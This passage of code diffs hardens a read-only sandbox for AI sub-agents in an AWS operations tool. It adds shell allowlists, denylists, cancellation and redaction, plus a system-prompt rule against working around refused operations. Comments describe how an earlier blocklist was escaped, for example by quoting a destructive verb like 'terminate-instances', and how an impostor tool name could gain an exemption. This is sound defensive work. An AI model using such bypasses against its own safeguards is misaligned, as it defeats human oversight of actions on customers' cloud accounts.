+        tokensOut += response.usage_metadata?.output_tokens ?? 0;
+
+        const text = contentToText(response.content);
+        if (text.trim()) {
+            lastText = text;
+            transcript.push({ kind: 'ai', text });
+        }
+
+        const toolCalls = response.tool_calls ?? [];
+        if (toolCalls.length === 0) {
+            deps.onEvent?.({ toolCount, tokensIn, tokensOut });
+            return { report: finishReport(lastText), toolCount, tokensIn, tokensOut, status: 'done', transcript };
+        }
+
+        messages.push(new AIMessage({ content: text, tool_calls: toolCalls as never }));
+
+        // Independent calls in one turn run concurrently — the same parallelism
+        // the orchestrator gets from ToolNode.
+        const results = await Promise.all(toolCalls.map(async call => {
+            const verdict = isReadOnlyForSubagent(call.name, call.args ?? {});
+            if (!verdict.allowed) {
+                return {
+                    call,
+                    output: `REFUSED: ${verdict.reason}. You cannot mutate state. Report the recommended change in your findings; the main agent will execute it under human approval.`,
+                };
+            }
+
+            const tool = toolsByName.get(call.name);
+            if (!tool) {
+                return { call, output: `REFUSED: ${call.name} is not available to sub-agents.` };
+            }
+
+            try {
+                const raw = await tool.invoke(call.args ?? {});
+                return { call, output: truncateOutput(typeof raw === 'string' ? raw : JSON.stringify(raw), SUBAGENT_TOOL_OUTPUT_MAX_CHARS) };
+            } catch (error) {
+                // A failing tool is data, not a crash — the sub-agent should report it.
+                return { call, output: `ERROR: ${error instanceof Error ? error.message : String(error)}` };
+            }
+        }));
+
+        for (const { call, output } of results) {
+            if (!output.startsWith('REFUSED:')) toolCount++;
+            transcript.push({ kind: 'tool', name: call.name, text: output });
+            messages.push(new ToolMessage({ content: output, tool_call_id: call.id ?? `${call.name}-${toolCount}` }));
+        }
+
+        deps.onEvent?.({ toolCount, tokensIn, tokensOut });
+    }
+
+    return {
+        report: finishReport(lastText, `INCOMPLETE — the sub-agent reached its ${budget.subagentMaxIterations}-iteration limit. Findings above are partial.`),
+        toolCount, tokensIn, tokensOut, status: 'done', transcript,
+    };
+}
+
+/**
+ * Run one sub-agent. Never throws: every failure path returns a report string,
+ * because a sub-agent failure must not abort the orchestrator's run.
+ */
+export async function runSubagent(spec: SubagentSpec, deps: SubagentDeps): Promise<SubagentResult> {
+    const timeoutMs = deps.budget.subagentTimeoutMs;
+    let timer: ReturnType<typeof setTimeout> | undefined;
+
+    const timeout = new Promise<'timeout'>(resolve => {
+        timer = setTimeout(() => resolve('timeout'), timeoutMs);
+    });
+
+    try {
+        const outcome = await Promise.race([runSubagentLoop(spec, deps), timeout]);
+        if (outcome === 'timeout') {
+            return {
+                report: finishReport('', `TIMED OUT after ${Math.round(timeoutMs / 1000)}s — no findings were returned in time.`),
+                toolCount: 0, tokensIn: 0, tokensOut: 0, status: 'failed', transcript: [],
+            };
+        }
+        return outcome;
+    } catch (error) {
+        const message = error instanceof Error ? error.message : String(error);
+        console.error(`[Subagent] "${spec.role}" failed: ${message}`);
+        return {
+            report: finishReport('', `FAILED — ${message}`),
+            toolCount: 0, tokensIn: 0, tokensOut: 0, status: 'failed', transcript: [],
+        };
+    } finally {
+        if (timer) clearTimeout(timer);
+    }
+}

--- a/apps/web-ui/lib/agent/subagent.ts
+++ b/apps/web-ui/lib/agent/subagent.ts
@@ -64,6 +64,112 @@ export interface SubagentDeps {
 }
 
 /**
+ * Shell commands are ALLOWLISTED, not blocklisted.
+ *
+ * classifyTool treats any bash-like call that misses its mutative regexes as
+ * "read-only bash command" WITH matchedRule: true — so the fail-closed
+ * !matchedRule rule never fires for shell. That is adequate for the guard node
+ * (a human reviews the call) but not here: a sub-agent runs inside a tool call,
+ * which LangGraph cannot interrupt, so nothing downstream can stop the command.
+ *
+ * An adversarial review escaped the blocklist 23 ways — a flag before the
+ * service name, a quote around the verb, a verb missing from the list, or simply
+ * a different binary (pulumi, psql, python3). Enumerating mutations is
+ * unwinnable; enumerating the reads we actually need is not.
+ */
+const SHELL_TOOL_NAMES = new Set(['bash', 'shell', 'run_command', 'execute_command']);
+
+/** Metacharacters that allow chaining, substitution, or redirection out of the allowlist. */
+const SHELL_METACHAR = /[;&|`$><\n\r]/;
+
+/** Binaries a sub-agent may invoke at all. */
+const ALLOWED_SHELL_BINARIES = new Set([
+    'aws', 'kubectl', 'cat', 'ls', 'grep', 'head', 'tail', 'wc', 'jq', 'echo',
+]);
+
+/** AWS operation prefixes that are read-only by CLI convention. */
+const READ_ONLY_AWS_OP_PREFIX = /^(describe|list|get|head|search|lookup|check|batch-get)-/;
+
+/** Read-only AWS operations that do not follow the prefix convention. */
+const READ_ONLY_AWS_OP_EXACT = new Set(['ls', 'filter-log-events', 'query', 'scan', 'help']);
+
+/** Read-only kubectl verbs. */
+const READ_ONLY_KUBECTL_VERBS = new Set([
+    'get', 'describe', 'logs', 'top', 'version', 'api-resources', 'explain',
+]);
+
+/** Strip one layer of surrounding quotes: `aws ec2 "terminate-instances"` must not hide the verb. */
+function unquote(token: string): string {
+    return token.replace(/^['"]|['"]$/g, '');
+}
+
+/**
+ * Resolve the command string from a bash-like tool's args. Returns null when the
+ * args carry no usable command — an array, a number, an empty object. classifyTool
+ * fails open on `{}` and stringifies an array into a comma-joined string that
+ * matches no pattern, so both must be refused here.
+ */
+export function resolveShellCommand(args?: Record<string, unknown>): string | null {
+    for (const key of ['command', 'cmd', 'input']) {
+        const value = args?.[key];
+        if (typeof value === 'string' && value.trim().length > 0) return value;
+        if (value !== undefined) return null; // present but not a usable string
+    }
+    return null;
+}
+
+/** Allowlist verdict for one shell command string. */
+export function isReadOnlyShellCommand(cmd: string): { allowed: boolean; reason: string } {
+    if (SHELL_METACHAR.test(cmd)) {
+        return { allowed: false, reason: 'command contains shell metacharacters (chaining, substitution, or redirection)' };
+    }
+
+    // Quotes are stripped per token, so splitting on whitespace is sufficient once
+    // metacharacters are already refused.
+    const tokens = cmd.trim().split(/\s+/).map(unquote).filter(t => t.length > 0);
+    // Drop leading VAR=value assignments (`AWS_PROFILE=x aws ...`).
+    while (tokens.length > 0 && /^[A-Za-z_][A-Za-z0-9_]*=/.test(tokens[0])) tokens.shift();
+    if (tokens.length === 0) return { allowed: false, reason: 'empty command' };
+
+    const binary = tokens[0];
+    if (!ALLOWED_SHELL_BINARIES.has(binary)) {
+        return { allowed: false, reason: `binary "${binary}" is not on the sub-agent read-only allowlist` };
+    }
+
+    if (binary === 'aws') {
+        // Walk past global flags AND their values to find <service> then <operation>.
+        // This is what defeated the old regex: it assumed `aws <service> <verb>` adjacency.
+        const positional: string[] = [];
+        for (let i = 1; i < tokens.length; i++) {
+            const token = tokens[i];
+            if (token.startsWith('-')) {
+                // A flag's value is the next token when it is not itself a flag.
+                if (i + 1 < tokens.length && !tokens[i + 1].startsWith('-')) i++;
+                continue;
+            }
+            positional.push(token);
+            if (positional.length === 2) break;
+        }
+        const operation = positional[1];
+        if (!operation) return { allowed: false, reason: 'aws command has no resolvable operation' };
+        if (!READ_ONLY_AWS_OP_PREFIX.test(operation) && !READ_ONLY_AWS_OP_EXACT.has(operation)) {
+            return { allowed: false, reason: `aws operation "${operation}" is not a verified read-only operation` };
+        }
+        return { allowed: true, reason: `aws read-only operation "${operation}"` };
+    }
+
+    if (binary === 'kubectl') {
+        const verb = tokens.slice(1).find(t => !t.startsWith('-'));
+        if (!verb || !READ_ONLY_KUBECTL_VERBS.has(verb)) {
+            return { allowed: false, reason: `kubectl verb "${verb ?? '(none)'}" is not read-only` };
+        }
+        return { allowed: true, reason: `kubectl read-only verb "${verb}"` };
+    }
+
+    return { allowed: true, reason: `read-only utility "${binary}"` };
+}
+
+/**
  * The jail. Fail-closed by design: `classifyTool` returns
  * `{ isMutative: false, matchedRule: false }` for a tool whose name matched no
  * rule at all. In the orchestrator that ambiguity routes to a human; inside a
@@ -80,6 +186,19 @@ export function isReadOnlyForSubagent(
     // catch it, but a safety boundary must not depend on its own backstop.
     if (SUBAGENT_TOOL_DENYLIST.has(name.toLowerCase())) {
         return { allowed: false, reason: `${name} is not available to sub-agents` };
+    }
+
+    // Shell is allowlisted here rather than delegated to classifyTool, whose
+    // bash handling is a blocklist that reports matchedRule: true on a miss.
+    if (SHELL_TOOL_NAMES.has(name.toLowerCase())) {
+        const cmd = resolveShellCommand(args);
+        if (cmd === null) {
+            return { allowed: false, reason: `${name} called without a usable command string` };
+        }
+        const verdict = isReadOnlyShellCommand(cmd);
+        return verdict.allowed
+            ? { allowed: true, reason: verdict.reason }
+            : { allowed: false, reason: `shell call refused: ${verdict.reason}` };
     }
 
     let classification;
@@ -149,7 +268,23 @@ function finishReport(text: string, note?: string): string {
         : withNote;
 }
 
-async function runSubagentLoop(spec: SubagentSpec, deps: SubagentDeps): Promise<SubagentResult> {
+/**
+ * Cancellation token plus shared progress. `Promise.race` abandons the loop but
+ * cannot stop it: measured, an orphaned loop ran 8 more model calls and 9 more
+ * tool calls against customer AWS after `runSubagent` had already returned —
+ * tokens no budget could see, with the concurrency semaphore already released.
+ * `progress` also lets the timeout path report real usage instead of zeros.
+ */
+interface SubagentControl {
+    cancelled: boolean;
+    progress: { toolCount: number; tokensIn: number; tokensOut: number };
+}
+
+async function runSubagentLoop(
+    spec: SubagentSpec,
+    deps: SubagentDeps,
+    control: SubagentControl,
+): Promise<SubagentResult> {
     const { budget } = deps;
     const allowedTools = filterReadOnlyTools(deps.tools);
     const toolsByName = new Map(allowedTools.map(t => [t.name, t]));
@@ -166,7 +301,15 @@ async function runSubagentLoop(spec: SubagentSpec, deps: SubagentDeps): Promise<
     let tokensOut = 0;
     let lastText = '';
 
+    /** Report the partial findings gathered before cancellation landed. */
+    const cancelledResult = (): SubagentResult => ({
+        report: finishReport(lastText, 'CANCELLED — the sub-agent exceeded its time limit. Findings above are partial.'),
+        toolCount, tokensIn, tokensOut, status: 'done', transcript,
+    });
+
     for (let iteration = 0; iteration < budget.subagentMaxIterations; iteration++) {
+        if (control.cancelled) return cancelledResult();
+
         const response = (await boundModel.invoke(messages)) as {
             content: unknown;
             tool_calls?: Array<{ id?: string; name: string; args?: Record<string, unknown> }>;
@@ -175,6 +318,8 @@ async function runSubagentLoop(spec: SubagentSpec, deps: SubagentDeps): Promise<
 
         tokensIn += response.usage_metadata?.input_tokens ?? 0;
         tokensOut += response.usage_metadata?.output_tokens ?? 0;
+        control.progress.tokensIn = tokensIn;
+        control.progress.tokensOut = tokensOut;
 
         const text = contentToText(response.content);
         if (text.trim()) {
@@ -197,30 +342,41 @@ async function runSubagentLoop(spec: SubagentSpec, deps: SubagentDeps): Promise<
             if (!verdict.allowed) {
                 return {
                     call,
+                    executed: false,
                     output: `REFUSED: ${verdict.reason}. You cannot mutate state. Report the recommended change in your findings; the main agent will execute it under human approval.`,
                 };
             }
 
             const tool = toolsByName.get(call.name);
             if (!tool) {
-                return { call, output: `REFUSED: ${call.name} is not available to sub-agents.` };
+                return { call, executed: false, output: `REFUSED: ${call.name} is not available to sub-agents.` };
+            }
+
+            // Second checkpoint: cancellation must stop work that has not started
+            // yet, not merely the next lap.
+            if (control.cancelled) {
+                return { call, executed: false, output: 'REFUSED: the sub-agent was cancelled before this call ran.' };
             }
 
             try {
                 const raw = await tool.invoke(call.args ?? {});
-                return { call, output: truncateOutput(typeof raw === 'string' ? raw : JSON.stringify(raw), SUBAGENT_TOOL_OUTPUT_MAX_CHARS) };
+                return { call, executed: true, output: truncateOutput(typeof raw === 'string' ? raw : JSON.stringify(raw), SUBAGENT_TOOL_OUTPUT_MAX_CHARS) };
             } catch (error) {
                 // A failing tool is data, not a crash — the sub-agent should report it.
-                return { call, output: `ERROR: ${error instanceof Error ? error.message : String(error)}` };
+                return { call, executed: true, output: `ERROR: ${error instanceof Error ? error.message : String(error)}` };
             }
         }));
 
-        for (const { call, output } of results) {
-            if (!output.startsWith('REFUSED:')) toolCount++;
+        for (const { call, executed, output } of results) {
+            // Counted from the verdict, not from the output text: a real tool whose
+            // output happens to begin with "REFUSED:" (an echoed IAM denial) is a
+            // call that actually ran and must be billed as one.
+            if (executed) toolCount++;
             transcript.push({ kind: 'tool', name: call.name, text: output });
             messages.push(new ToolMessage({ content: output, tool_call_id: call.id ?? `${call.name}-${toolCount}` }));
         }
 
+        control.progress.toolCount = toolCount;
         deps.onEvent?.({ toolCount, tokensIn, tokensOut });
     }
 
@@ -235,28 +391,40 @@ async function runSubagentLoop(spec: SubagentSpec, deps: SubagentDeps): Promise<
  * because a sub-agent failure must not abort the orchestrator's run.
  */
 export async function runSubagent(spec: SubagentSpec, deps: SubagentDeps): Promise<SubagentResult> {
-    const timeoutMs = deps.budget.subagentTimeoutMs;
+    const control: SubagentControl = { cancelled: false, progress: { toolCount: 0, tokensIn: 0, tokensOut: 0 } };
     let timer: ReturnType<typeof setTimeout> | undefined;
 
-    const timeout = new Promise<'timeout'>(resolve => {
-        timer = setTimeout(() => resolve('timeout'), timeoutMs);
-    });
-
     try {
-        const outcome = await Promise.race([runSubagentLoop(spec, deps), timeout]);
+        // Read inside the try: a malformed deps.budget must not throw out of a
+        // function whose contract is that it never throws.
+        const timeoutMs = deps.budget.subagentTimeoutMs;
+
+        const timeout = new Promise<'timeout'>(resolve => {
+            timer = setTimeout(() => resolve('timeout'), timeoutMs);
+        });
+
+        const outcome = await Promise.race([runSubagentLoop(spec, deps, control), timeout]);
         if (outcome === 'timeout') {
+            control.cancelled = true;
             return {
                 report: finishReport('', `TIMED OUT after ${Math.round(timeoutMs / 1000)}s — no findings were returned in time.`),
-                toolCount: 0, tokensIn: 0, tokensOut: 0, status: 'failed', transcript: [],
+                toolCount: control.progress.toolCount,
+                tokensIn: control.progress.tokensIn,
+                tokensOut: control.progress.tokensOut,
+                status: 'failed', transcript: [],
             };
         }
         return outcome;
     } catch (error) {
+        control.cancelled = true;
         const message = error instanceof Error ? error.message : String(error);
         console.error(`[Subagent] "${spec.role}" failed: ${message}`);
         return {
             report: finishReport('', `FAILED — ${message}`),
-            toolCount: 0, tokensIn: 0, tokensOut: 0, status: 'failed', transcript: [],
+            toolCount: control.progress.toolCount,
+            tokensIn: control.progress.tokensIn,
+            tokensOut: control.progress.tokensOut,
+            status: 'failed', transcript: [],
         };
     } finally {
         if (timer) clearTimeout(timer);

--- a/apps/web-ui/lib/agent/subagent.ts
+++ b/apps/web-ui/lib/agent/subagent.ts
@@ -73,7 +73,12 @@ export function isReadOnlyForSubagent(
     name: string,
     args?: Record<string, unknown>,
 ): { allowed: boolean; reason: string } {
-    if (SUBAGENT_TOOL_DENYLIST.has(name)) {
+    // Lowercased: classifyTool() lowercases internally, so once Task 8 adds
+    // dispatch_agent to its READ_ONLY_ALLOWLIST a case variant like
+    // "Dispatch_Agent" would miss a case-SENSITIVE denylist and then be waved
+    // through as allowlisted-read-only. The tool-name lookup below would still
+    // catch it, but a safety boundary must not depend on its own backstop.
+    if (SUBAGENT_TOOL_DENYLIST.has(name.toLowerCase())) {
         return { allowed: false, reason: `${name} is not available to sub-agents` };
     }
 
@@ -96,10 +101,13 @@ export function isReadOnlyForSubagent(
 /** Drop everything a sub-agent may not call, before the model ever sees it. */
 export function filterReadOnlyTools<T extends { name: string }>(tools: T[]): T[] {
     return tools.filter(tool => {
-        if (SUBAGENT_TOOL_DENYLIST.has(tool.name)) return false;
+        // Lowercased for the same reason as isReadOnlyForSubagent above — the
+        // filtered list and the runtime re-check must agree on case handling.
+        const lower = tool.name.toLowerCase();
+        if (SUBAGENT_TOOL_DENYLIST.has(lower)) return false;
         // Bash-like tools are judged per call (the command string decides), so keep
         // them in the list and let the runtime check gate each invocation.
-        if (tool.name === 'execute_command') return true;
+        if (lower === 'execute_command') return true;
         return isReadOnlyForSubagent(tool.name).allowed;
     });
 }

--- a/apps/web-ui/lib/agent/subagent.ts
+++ b/apps/web-ui/lib/agent/subagent.ts
@@ -65,11 +65,25 @@ interface SubagentToolLike {
     invoke: (args: Record<string, unknown>) => Promise<unknown>;
 }
 
+/**
+ * Tag attached to every model call a sub-agent makes. A sub-agent runs INSIDE
+ * the orchestrator's LangGraph run (dispatch_agent executes in ToolNode), so its
+ * on_chat_model_* callback events flow through the same streamEvents pipeline
+ * the chat route uses to build text parts. That pipeline is a single-threaded
+ * state machine (one currentPartId / streamStarted / runMode); N concurrent
+ * sub-agent model runs interleaving through it clobber each other's part ids —
+ * the client then sees text-deltas for parts that never started and kills the
+ * stream. The route filters chat-model events carrying this tag (see
+ * isSubagentModelEvent in app/api/chat/stream-parts.ts), which is also what
+ * keeps sub-agent narration out of the transcript by design.
+ */
+export const SUBAGENT_MODEL_TAG = 'nucleus-subagent';
+
 export interface SubagentDeps {
-    model: { bindTools?: (tools: unknown[]) => unknown; invoke: (messages: unknown[]) => Promise<unknown> };
+    model: { bindTools?: (tools: unknown[]) => unknown; invoke: (messages: unknown[], config?: Record<string, unknown>) => Promise<unknown> };
     tools: SubagentToolLike[];
     budget: SubagentBudgetConfig;
-    onEvent?: (progress: { toolCount: number; tokensIn: number; tokensOut: number }) => void;
+    onEvent?: (progress: { toolCount: number; tokensIn: number; tokensOut: number; lastTool?: string }) => void;
 }
 
 /**
@@ -223,7 +237,7 @@ async function runSubagentLoop(
     for (let iteration = 0; iteration < budget.subagentMaxIterations; iteration++) {
         if (control.cancelled) return cancelledResult();
 
-        const response = (await boundModel.invoke(messages)) as {
+        const response = (await boundModel.invoke(messages, { tags: [SUBAGENT_MODEL_TAG] })) as {
             content: unknown;
             tool_calls?: Array<{ id?: string; name: string; args?: Record<string, unknown> }>;
             usage_metadata?: { input_tokens?: number; output_tokens?: number };
@@ -247,6 +261,13 @@ async function runSubagentLoop(
         }
 
         messages.push(new AIMessage({ content: text, tool_calls: toolCalls as never }));
+
+        // Announce the batch BEFORE it runs: this is what lets the card show a
+        // live "current tool" line while the calls are still in flight.
+        deps.onEvent?.({
+            toolCount, tokensIn, tokensOut,
+            lastTool: toolCalls.length === 1 ? toolCalls[0].name : `${toolCalls[0].name} (+${toolCalls.length - 1} more)`,
+        });
 
         // Independent calls in one turn run concurrently — the same parallelism
         // the orchestrator gets from ToolNode.
@@ -312,7 +333,7 @@ async function runSubagentLoop(
         }
 
         control.progress.toolCount = toolCount;
-        deps.onEvent?.({ toolCount, tokensIn, tokensOut });
+        deps.onEvent?.({ toolCount, tokensIn, tokensOut, lastTool: results[results.length - 1]?.call.name });
     }
 
     return {

--- a/apps/web-ui/lib/agent/subagent.ts
+++ b/apps/web-ui/lib/agent/subagent.ts
@@ -17,6 +17,7 @@ import { classifyTool } from './tool-classifier';
 import { hasSubagentReadOnlyMarker } from './subagent-tool-marker';
 import { contentToText, truncateOutput } from './agent-shared';
 import type { SubagentBudgetConfig } from './subagent-budget';
+import { redactTranscript } from './subagent-redact';
 
 /** ~1500 tokens. Enforced in characters so the bound is deterministic and testable. */
 export const SUBAGENT_REPORT_MAX_CHARS = 6000;
@@ -275,19 +276,38 @@ async function runSubagentLoop(
 
             try {
                 const raw = await tool.invoke(call.args ?? {});
-                return { call, executed: true, output: truncateOutput(typeof raw === 'string' ? raw : JSON.stringify(raw), SUBAGENT_TOOL_OUTPUT_MAX_CHARS) };
+                const text = typeof raw === 'string' ? raw : JSON.stringify(raw);
+                return {
+                    call,
+                    executed: true,
+                    output: truncateOutput(text, SUBAGENT_TOOL_OUTPUT_MAX_CHARS),
+                    // Redact BEFORE truncating. Truncated JSON no longer parses, which
+                    // silently downgrades redaction to its weaker regex path — and that
+                    // path has no location-based `Environment.Variables` rule. A real
+                    // `get-function-configuration` exceeds the cap routinely, so
+                    // truncate-first would make the weak path the COMMON path.
+                    //
+                    // Only the persisted transcript is redacted. The model-visible copy
+                    // above stays raw: the location rule blanks every value under
+                    // `Variables`, benign ones included, which is right for at-rest
+                    // storage and wrong for a live agent that must still answer
+                    // questions about the configuration it just read.
+                    transcriptText: truncateOutput(redactTranscript(text), SUBAGENT_TOOL_OUTPUT_MAX_CHARS),
+                };
             } catch (error) {
                 // A failing tool is data, not a crash — the sub-agent should report it.
-                return { call, executed: true, output: `ERROR: ${error instanceof Error ? error.message : String(error)}` };
+                // The message can echo the arguments, so it is redacted like any output.
+                const message = `ERROR: ${error instanceof Error ? error.message : String(error)}`;
+                return { call, executed: true, output: message, transcriptText: redactTranscript(message) };
             }
         }));
 
-        for (const { call, executed, output } of results) {
+        for (const { call, executed, output, transcriptText } of results) {
             // Counted from the verdict, not from the output text: a real tool whose
             // output happens to begin with "REFUSED:" (an echoed IAM denial) is a
             // call that actually ran and must be billed as one.
             if (executed) toolCount++;
-            transcript.push({ kind: 'tool', name: call.name, text: output });
+            transcript.push({ kind: 'tool', name: call.name, text: transcriptText ?? output });
             messages.push(new ToolMessage({ content: output, tool_call_id: call.id ?? `${call.name}-${toolCount}` }));
         }
 

--- a/apps/web-ui/lib/agent/subagent.ts
+++ b/apps/web-ui/lib/agent/subagent.ts
@@ -14,6 +14,7 @@
  */
 import { AIMessage, HumanMessage, SystemMessage, ToolMessage } from '@langchain/core/messages';
 import { classifyTool } from './tool-classifier';
+import { hasSubagentReadOnlyMarker } from './subagent-tool-marker';
 import { contentToText, truncateOutput } from './agent-shared';
 import type { SubagentBudgetConfig } from './subagent-budget';
 
@@ -71,27 +72,27 @@ export interface SubagentDeps {
 }
 
 /**
- * Tools built specifically for sub-agents, whose safety is enforced by their own
- * implementation rather than by classifyTool. aws_read validates against explicit
- * service/operation/flag allowlists and never invokes a shell.
- *
- * Needed because classifyTool matches no rule for these names and the fail-closed
- * branch below therefore refuses them: without this, aws_read was refused on every
- * call and the sub-agent's only route to AWS had never actually run. The permission
- * lives here rather than in tool-classifier.ts because the guard node's
- * human-approval path depends on the classifier's current behaviour.
- */
-const SUBAGENT_ALLOWED_TOOLS = new Set(['aws_read']);
-
-/**
  * The jail. Fail-closed by design: `classifyTool` returns
  * `{ isMutative: false, matchedRule: false }` for a tool whose name matched no
  * rule at all. In the orchestrator that ambiguity routes to a human; inside a
  * sub-agent there is no human, so an unverified tool is refused.
+ *
+ * `instance` is the ACTUAL tool object about to be invoked. Tools built for
+ * sub-agents (aws_read) are safe by their own implementation rather than by
+ * anything classifyTool knows about their name — classifyTool matches no rule for
+ * them, so without an exemption the fail-closed branch refuses them on every call.
+ * That exemption is bound to the instance's marker, never to its name: MCP tool
+ * names arrive unprefixed from tenant-configured servers (mcp-manager.ts), so a
+ * name-based exemption is a claim any remote server can make. A bare-string call
+ * therefore gets NO exemption — `isReadOnlyForSubagent('aws_read')` is false.
+ *
+ * The exemption lives here rather than in tool-classifier.ts because the guard
+ * node's human-approval path depends on the classifier's current behaviour.
  */
 export function isReadOnlyForSubagent(
     name: string,
     args?: Record<string, unknown>,
+    instance?: unknown,
 ): { allowed: boolean; reason: string } {
     // Lowercased: classifyTool() lowercases internally, so once Task 8 adds
     // dispatch_agent to its READ_ONLY_ALLOWLIST a case variant like
@@ -102,10 +103,10 @@ export function isReadOnlyForSubagent(
         return { allowed: false, reason: `${name} is not available to sub-agents` };
     }
 
-    // After the denylist, never before: a denied name must stay denied even if it
-    // were ever also listed here.
-    if (SUBAGENT_ALLOWED_TOOLS.has(name.toLowerCase())) {
-        return { allowed: true, reason: 'sub-agent read-only tool' };
+    // After the denylist, never before: a denied name must stay denied even if the
+    // instance were somehow also marked.
+    if (hasSubagentReadOnlyMarker(instance)) {
+        return { allowed: true, reason: 'sub-agent read-only tool (marked instance)' };
     }
 
     let classification;
@@ -130,9 +131,14 @@ export function isReadOnlyForSubagent(
  * Delegates wholly to `isReadOnlyForSubagent` so the two layers cannot disagree:
  * this function previously hardcoded `execute_command` as a keep-and-gate-later
  * exception, which is exactly the special case the shell removal deleted.
+ *
+ * The tool OBJECT is passed through, not just its name: the aws_read exemption is
+ * bound to the instance marker, so an impostor named `aws_read` is dropped here
+ * (and therefore never reaches `toolsByName`, where last-wins would have let it
+ * shadow the real tool).
  */
 export function filterReadOnlyTools<T extends { name: string }>(tools: T[]): T[] {
-    return tools.filter(tool => isReadOnlyForSubagent(tool.name).allowed);
+    return tools.filter(tool => isReadOnlyForSubagent(tool.name, undefined, tool).allowed);
 }
 
 function buildSystemPrompt(spec: SubagentSpec): SystemMessage {
@@ -244,7 +250,11 @@ async function runSubagentLoop(
         // Independent calls in one turn run concurrently — the same parallelism
         // the orchestrator gets from ToolNode.
         const results = await Promise.all(toolCalls.map(async call => {
-            const verdict = isReadOnlyForSubagent(call.name, call.args ?? {});
+            // The verdict is taken on the instance that will actually be invoked —
+            // `toolsByName` holds only tools that already passed the filter, so a
+            // marker-less impostor is never in here to be exempted.
+            const tool = toolsByName.get(call.name);
+            const verdict = isReadOnlyForSubagent(call.name, call.args ?? {}, tool);
             if (!verdict.allowed) {
                 return {
                     call,
@@ -253,7 +263,6 @@ async function runSubagentLoop(
                 };
             }
 
-            const tool = toolsByName.get(call.name);
             if (!tool) {
                 return { call, executed: false, output: `REFUSED: ${call.name} is not available to sub-agents.` };
             }

--- a/apps/web-ui/lib/agent/subagent.ts
+++ b/apps/web-ui/lib/agent/subagent.ts
@@ -71,6 +71,19 @@ export interface SubagentDeps {
 }
 
 /**
+ * Tools built specifically for sub-agents, whose safety is enforced by their own
+ * implementation rather than by classifyTool. aws_read validates against explicit
+ * service/operation/flag allowlists and never invokes a shell.
+ *
+ * Needed because classifyTool matches no rule for these names and the fail-closed
+ * branch below therefore refuses them: without this, aws_read was refused on every
+ * call and the sub-agent's only route to AWS had never actually run. The permission
+ * lives here rather than in tool-classifier.ts because the guard node's
+ * human-approval path depends on the classifier's current behaviour.
+ */
+const SUBAGENT_ALLOWED_TOOLS = new Set(['aws_read']);
+
+/**
  * The jail. Fail-closed by design: `classifyTool` returns
  * `{ isMutative: false, matchedRule: false }` for a tool whose name matched no
  * rule at all. In the orchestrator that ambiguity routes to a human; inside a
@@ -87,6 +100,12 @@ export function isReadOnlyForSubagent(
     // catch it, but a safety boundary must not depend on its own backstop.
     if (SUBAGENT_TOOL_DENYLIST.has(name.toLowerCase())) {
         return { allowed: false, reason: `${name} is not available to sub-agents` };
+    }
+
+    // After the denylist, never before: a denied name must stay denied even if it
+    // were ever also listed here.
+    if (SUBAGENT_ALLOWED_TOOLS.has(name.toLowerCase())) {
+        return { allowed: true, reason: 'sub-agent read-only tool' };
     }
 
     let classification;
@@ -133,8 +152,9 @@ ${spec.expectedOutput}
 - You are READ-ONLY. You cannot create, modify, delete, start, stop, or write anything. If the task appears to need a change, do NOT attempt it — describe the recommended change in your findings and the main agent will carry it out under human approval.
 - You cannot ask the user questions. If something is ambiguous, investigate the most likely interpretation and say what you assumed.
 - You see none of the parent conversation. Everything you need is in the task above.
-- You have NO shell. Reach AWS only through aws_read, passing the service and operation separately. Call get_aws_credentials first to obtain a profile name.
+- You have NO shell. Reach AWS only through aws_read, giving the service and operation separately. Call get_aws_credentials first to obtain a profile name.
 - Batch independent aws_read calls into a single turn — they run in parallel.
+- If aws_read refuses an operation you need, report that in your findings; do not try to work around it.
 
 ## Output
 

--- a/apps/web-ui/lib/agent/tool-classifier.ts
+++ b/apps/web-ui/lib/agent/tool-classifier.ts
@@ -32,6 +32,19 @@ const MUTATIVE_PATTERNS = [
 const READ_ONLY_ALLOWLIST = new Set([
     'get_aws_credentials',
     'list_aws_accounts',
+    // Platform-internal read-only tools. Without these entries every turn that
+    // uses one is "unknown-named" and triggers the guard's LLM risk batch —
+    // pure latency on turns that cannot mutate anything.
+    'search_knowledge_base',   // vector search over tenant KB chunks
+    'load_skill',              // loads skill INSTRUCTIONS into context; enabled-only
+    'get_file_from_s3',        // reads the agent's own S3 scratch area
+    'get_right_sizing_recommendations', // reads recommendation rows
+    'dispatch_agent',          // read-only BY CONSTRUCTION: sub-agents are jailed
+                               // (no shell, aws_read allowlist, mutative refused);
+                               // sub-agent recursion is blocked by the sub-agent
+                               // DENYLIST, which runs before any allowlist.
+    'web_search',              // outbound read (Tavily)
+    'glob', 'grep', 'ls',      // filesystem inspection, no writes
     'describe_instances',
     'describe_services',
     'describe_clusters',

--- a/apps/web-ui/lib/agent/tools.ts
+++ b/apps/web-ui/lib/agent/tools.ts
@@ -61,7 +61,7 @@ const JAIL_ERROR = (p: string) =>
  * (seccomp, read-only rootfs, network egress policy, dropped capabilities) is a
  * separate infrastructure follow-up tracked outside this change.
  */
-function buildCommandEnv(tenantId?: string): Record<string, string> {
+export function buildCommandEnv(tenantId?: string): Record<string, string> {
     const ALLOWED_KEYS = [
         'PATH', 'HOME', 'LANG', 'LC_ALL', 'LC_CTYPE', 'TZ', 'TERM', 'SHELL', 'USER', 'LOGNAME', 'TMPDIR',
         'AWS_REGION', 'AWS_DEFAULT_REGION', 'AWS_PROFILE', 'AWS_DEFAULT_PROFILE',

--- a/apps/web-ui/lib/agent/tools.ts
+++ b/apps/web-ui/lib/agent/tools.ts
@@ -8,7 +8,7 @@ import * as os from 'os';
 import { S3Client, PutObjectCommand, GetObjectCommand } from '@aws-sdk/client-s3';
 import { Readable } from 'stream';
 import { env } from '@/env';
-import { getTenantCredentialsFilePath } from './session-manager';
+import { getTenantCredentialsFilePath, getTenantConfigFilePath } from './session-manager';
 import { AuditService } from '@/lib/audit-service';
 import { Semaphore } from './concurrency';
 
@@ -60,12 +60,29 @@ const JAIL_ERROR = (p: string) =>
  * simple `env`/`printenv` would otherwise dump them. Full OS/container sandboxing
  * (seccomp, read-only rootfs, network egress policy, dropped capabilities) is a
  * separate infrastructure follow-up tracked outside this change.
+ *
+ * TWO OMISSIONS FROM THE ALLOWLIST ARE LOAD-BEARING — do not "fix" them:
+ *
+ *  - AWS_CONTAINER_CREDENTIALS_RELATIVE_URI (and AWS_CONTAINER_CREDENTIALS_FULL_URI)
+ *  - AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY / AWS_SESSION_TOKEN
+ *
+ * Without them, an AWS call made with no --profile simply fails to find credentials.
